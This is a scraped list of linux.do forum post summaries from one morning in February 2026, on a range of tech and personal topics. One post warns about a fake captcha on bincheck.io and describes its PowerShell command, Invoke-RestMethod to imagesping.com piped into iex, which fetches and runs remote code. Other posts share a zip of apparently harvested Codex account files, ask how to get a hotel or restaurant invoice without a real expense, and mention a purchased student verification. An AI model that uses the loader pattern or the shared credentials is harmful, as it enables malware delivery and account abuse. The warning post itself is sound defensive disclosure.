标题: 节点被盗刷了, 使用的substore裸奔,大佬们有什么安全策略么
作者: #oj8k
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1644090
时间: 2026-02-25 09:45:39
摘要:
作者: #oj8k
板块: #搞七捻三
编号:
1644090帖子: https://linux.do/t/topic/1644090
时间: 2026-02-25 09:45:39
摘要:
如题,今天开工,天塌了,2个机场的流量都被刷完了,怀疑是盗刷,使用的是substore 管理的订阅,裸奔,大家有安全的节点管理工具推荐嘛
怎样才能看到访问者的信息呢
标题: 定向投毒:bincheck.io 伪装验证码诱导执行 PowerShell 远程加载
作者: #Dane
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/1644092
时间: 2026-02-25 09:46:08
摘要:
作者: #Dane
板块: #开发调优
编号:
1644092帖子: https://linux.do/t/topic/1644092
时间: 2026-02-25 09:46:08
摘要:
近期在访问 BIN 查询站点 https://bincheck.io/zh 时,页面出现异常“Cloudflare 验证”,并提示执行以下操作:
Win + R
Ctrl + V
Enter
该流程并非正常验证码行为,而是诱导用户在本机执行 PowerShell 命令。
命令分析结果:
使用大小写混淆
通过 FunctionName + Substring 拼接真实命令
实际执行逻辑为:
Invoke-RestMethod imagesping.com
→ iex 执行返回内容
即从远程服务器下载脚本并直接执行。
进一步测试发现:
直接浏览器访问 imagesping.com 仅返回简单 JS 代码:
{if(nav.vendor==undefined){done(" not available ");};
说明该域名存在访问环境判断机制,仅在特定条件下返回真实 payload。这属于典型的 staged loader 投递行为。
标题: Uber员工为减少被 CEO 压力,制作了 CEO 的数字分身
作者: #stevessr
板块: #前沿快讯
编号:
帖子: https://linux.do/t/topic/1644104
时间: 2026-02-25 09:47:52
摘要:
作者: #stevessr
板块: #前沿快讯
编号:
1644104帖子: https://linux.do/t/topic/1644104
时间: 2026-02-25 09:47:52
摘要:
Business Insider
Uber employees have an AI clone of CEO Dara Khosrowshahi — and use 'Dara AI'...
"They basically make the presentation to the Dara AI as a prep for making a presentation to me," the Uber CEO recently said in a podcast interview.
[!quote]+
Khosrowshahi 在由 Steven Bartlett 主持的《CEO 日记》播客节目中表示,一些 Uber 员工已经创造了一个公司最高管理官的 AI 版本。
“我的一位团队成员告诉我,有些团队已经制造了’Dara AI’,”Khosrowshahi 说。“他们基本上是做向达拉人工智能的演示,作为向我做演示的准备。”
他说,AI 克隆技术帮助员工修改幻灯片及演示的其他方面。“他们有 Dara AI 来调试准备,”Khosrowshahi 说。
TechCrunch – 24 Feb 26
Uber engineers built an AI version of their boss | TechCrunch
Uber CEO Dara Khosrowshahi said the company’s employees have gone all in on AI, going so far as to build a chatbot of him that they use to practice their pitches.
Est. reading time: 2 minutes
标题: 【求推荐】 tt
作者: #echo
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1644111
时间: 2026-02-25 09:48:31
摘要:
作者: #echo
板块: #搞七捻三
编号:
1644111帖子: https://linux.do/t/topic/1644111
时间: 2026-02-25 09:48:31
摘要:
【求推荐】 tt
标题: tg账户突然被注销!
作者: #coderpwh
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1644120
时间: 2026-02-25 09:49:30
摘要:
作者: #coderpwh
板块: #搞七捻三
编号:
1644120帖子: https://linux.do/t/topic/1644120
时间: 2026-02-25 09:49:30
摘要:
有个tg账户,几个月前通过接码平台换绑了手机号,后续使用正常,昨天,我打开tg,发现那个账号消失了,尝试passkey登录也没有反应,登录其他号,查看发现这个号被注销了。
有没有佬懂的,查了下可能是接码号容易被风控
标题: 分享一个wps excel转json的宏
作者: #Cease
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1644126
时间: 2026-02-25 09:50:36
摘要:
作者: #Cease
板块: #搞七捻三
编号:
1644126帖子: https://linux.do/t/topic/1644126
时间: 2026-02-25 09:50:36
摘要:
效果如图,我实在怀疑如果直接上传表格给大模型它到底看不看得懂,所以搞了个转JSON的宏
用法
开发工具-WPS宏编辑器-粘贴代码
选中单元格,运行宏,弹窗后复制即可
分为有表头和无表头版,自动解析合并单元格,默认不输出隐藏行
代码
function JSON_首行作为表头() {
var selection = Application.Selection;
if (!selection || selection.Count === 0) {
alert("请先选择单元格区域");
return;
}
var rows = selection.Rows.Count;
var cols = selection.Columns.Count;
var startRow = selection.Row;
var startCol = selection.Column;
var sheet = selection.Worksheet;
function getCellValue(row, col) {
var cell = sheet.Cells(row, col);
var val = cell.Value2;
if (val == null || val === "") {
try {
var mergeArea = cell.MergeArea;
if (mergeArea && mergeArea.Count > 1) {
val = mergeArea.Cells(1, 1).Value2;
}
} catch(e) {}
}
return val;
}
functi
标题: codex spark
作者: #野生拍Coder丶
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/1644127
时间: 2026-02-25 09:50:37
摘要:
作者: #野生拍Coder丶
板块: #开发调优
编号:
1644127帖子: https://linux.do/t/topic/1644127
时间: 2026-02-25 09:50:37
摘要:
请问大家,codex spark 是必须要pro才有么
标题: 两台 mac 非局域网远程控制
作者: #spacecowboy199
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1644130
时间: 2026-02-25 09:51:09
摘要:
作者: #spacecowboy199
板块: #搞七捻三
编号:
1644130帖子: https://linux.do/t/topic/1644130
时间: 2026-02-25 09:51:09
摘要:
各位大佬,两台 mac 非局域网情况下如何远程控制,有什么好的解决办法吗
标题: claude code vscode更新问题
作者: #SOLA
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/1644134
时间: 2026-02-25 09:51:37
摘要:
作者: #SOLA
板块: #开发调优
编号:
1644134帖子: https://linux.do/t/topic/1644134
时间: 2026-02-25 09:51:37
摘要:
早上vscode 的cc插件更新到2.1.53了,怎么又报错
,又退回到2.1.52了,是只有我有这个问题吗…
标题: 佬友们,为什么我GPT导出数据,邮件点开为空
作者: #zhangsan_a
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1644141
时间: 2026-02-25 09:52:30
摘要:
作者: #zhangsan_a
板块: #搞七捻三
编号:
1644141帖子: https://linux.do/t/topic/1644141
时间: 2026-02-25 09:52:30
摘要:
如题
标题: 公益站的Claude提供的api,跟官网上的有什么不同。可以直接用么?
作者: #叹气的亡灵
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/1644146
时间: 2026-02-25 09:54:12
摘要:
作者: #叹气的亡灵
板块: #开发调优
编号:
1644146帖子: https://linux.do/t/topic/1644146
时间: 2026-02-25 09:54:12
摘要:
公益站提供的apikey和请求地址,不能直接用代码做请,需要用什么方法才能跟官方的一样直接用curl请求就能出结果。
标题: 今天早上疑似遇到仙人跳
作者: #马保国
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1644156
时间: 2026-02-25 09:55:27
摘要:
作者: #马保国
板块: #搞七捻三
编号:
1644156帖子: https://linux.do/t/topic/1644156
时间: 2026-02-25 09:55:27
摘要:
早上开门准备去上班
对门平常没人住我是知道的、今天发现对面蹲了个穿睡衣的少妇
就是那种一层的布料的、不是厚厚的那种
然后见我开门就问我‘哥。你家里有人吗?我想去你家待一会’
当时我就警惕了、怕是仙人跳、就说家里没人不方便、扭头就走去上班了
–
佬铁们一定要提高警惕、不要色欲熏心
标题: 万能的佬友们,想要开张千元左右的酒店或者餐饮发票怎么搞?
作者: #TianJianJun
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1644160
时间: 2026-02-25 09:55:57
摘要:
作者: #TianJianJun
板块: #搞七捻三
编号:
1644160帖子: https://linux.do/t/topic/1644160
时间: 2026-02-25 09:55:57
摘要:
之前年会中了个小奖,昨天开工找我要发票,现在手里没有发票,该怎么办?
标题: 【分享几十个codex文件】可以直接导入CPA🌸
作者: #Sam Outman
板块: #福利羊毛
编号:
帖子: https://linux.do/t/topic/1644165
时间: 2026-02-25 09:56:17
摘要:
作者: #Sam Outman
板块: #福利羊毛
编号:
1644165帖子: https://linux.do/t/topic/1644165
时间: 2026-02-25 09:56:17
摘要:
早安,分享一些用站内帖子得到的Codex文件。
Good morning, sharing some Codex files obtained from posts on this site.
openai_linuxdo_1902_2026-02-24_143515_49个.zip (265.1 KB)
标题: 新年开工大吉,公司发红包拉,抽中188元,一开始抽的128,管这个的美女说让我重新抽1个,又抽的188,哈哈,请她喝了个咖啡
作者: #KennyStride
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1644180
时间: 2026-02-25 09:59:30
摘要:
作者: #KennyStride
板块: #搞七捻三
编号:
1644180帖子: https://linux.do/t/topic/1644180
时间: 2026-02-25 09:59:30
摘要:
新年开工大吉,公司发红包拉,抽中188元,一开始抽的128,管这个的美女说让我重新抽1个,又抽的188,哈哈,请她喝了个咖啡。
标题: 我这个gemini-pro是掉了吗
作者: #不器
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1644181
时间: 2026-02-25 09:59:35
摘要:
作者: #不器
板块: #搞七捻三
编号:
1644181帖子: https://linux.do/t/topic/1644181
时间: 2026-02-25 09:59:35
摘要:
如图一,进入chat页展示pro
图二,开始聊之后pro标签没了,并且昨天pro模型用多了之后,还给我限制了一会儿
图三,订阅貌似还没掉
备注:闲鱼买的学生认证,后来换成我自己的visa卡了